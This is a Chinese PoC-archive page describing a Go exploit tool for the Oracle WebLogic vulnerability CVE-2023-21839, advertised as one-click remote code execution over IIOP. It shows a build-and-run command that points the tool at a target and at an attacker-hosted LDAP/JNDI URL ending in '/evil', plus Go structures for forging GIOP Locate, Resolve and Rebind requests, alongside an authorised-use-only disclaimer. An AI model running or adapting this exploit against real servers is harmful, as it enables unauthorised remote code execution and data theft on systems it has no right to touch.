POC详情: 08ea8f89c5b6beeb22f8614737ac07f42480f5f0

来源
关联漏洞
标题: Oracle WebLogic Server 安全漏洞 (CVE-2023-21839)
描述:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。
描述
Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)
介绍
## CVE-2023-21839

**未经授权许可使用本项目攻击或测试目标是非法的,本程序应仅用于授权的安全测试与研究目的**

### 介绍

Weblogic CVE-2023-21839 RCE

(1)**无需任何 Java 依赖,构造协议通过socket直接RCE**

(2)已解决 IIOP 的 NAT 网络问题(可测试 Docker 与公网目标)

(3)在 Windows/Mac OS/Linux 以及 Weblogic 12/14 中测试通过

(4)请使用 JDK 8u191 以下启动 Weblogic 并自行搭建 JNDI Server

### 使用

```shell
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
```

![](img/rce.png)

### 其他

Locate Request

```go
type LocateRequest struct {
	Header            *Header
	RequestId         []byte // 4
	TargetAddress     []byte // 2
	_reserved         []byte // 2
	_keyAddressLength []byte // 4
	KeyAddress        []byte // _keyAddressLength
}
```

Resolve Request

```go
type ResolveRequest struct {
	Header             *Header
	RequestId          []byte // 4
	ResponseFlags      []byte // 1
	_reserved1         []byte // 3
	TargetAddress      []byte // 2
	_reserved2         []byte // 2
	_keyAddressLength  []byte // 4
	KeyAddress         []byte // _keyAddressLength
	_operationLength   []byte // 4
	RequestOperation   []byte // _operationLength
	_reserved3         []byte // 1
	ServiceContextList *ServiceContextList
	CosNamingDissector []byte // no limit
}
```

Rebind Request

```go
type RebindRequest struct {
	Header             *Header
	RequestId          []byte // 4
	ResponseFlags      []byte // 1
	_reserved1         []byte // 3
	TargetAddress      []byte // 2
	_reserved2         []byte // 2
	_keyAddressLength  []byte // 4
	KeyAddress         []byte // _keyAddressLength
	_operationLength   []byte // 4
	RequestOperation   []byte // _operationLength
	_reserved3         []byte // 2
	ServiceContextList *ServiceContextList
	StubData           []byte // no limit
}
```
文件快照

[4.0K] /data/pocs/08ea8f89c5b6beeb22f8614737ac07f42480f5f0 ├── [4.0K] cmd │   └── [ 12K] main.go ├── [ 318] constant.go ├── [ 301] giop.go ├── [ 31] go.mod ├── [ 218] header.go ├── [4.0K] img │   └── [ 79K] rce.png ├── [1.1K] locate_request.go ├── [ 94] log.go ├── [1.9K] README.md ├── [2.9K] rebind_request.go ├── [2.9K] resolve_request.go ├── [ 423] service_context.go └── [ 479] version.go 2 directories, 13 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。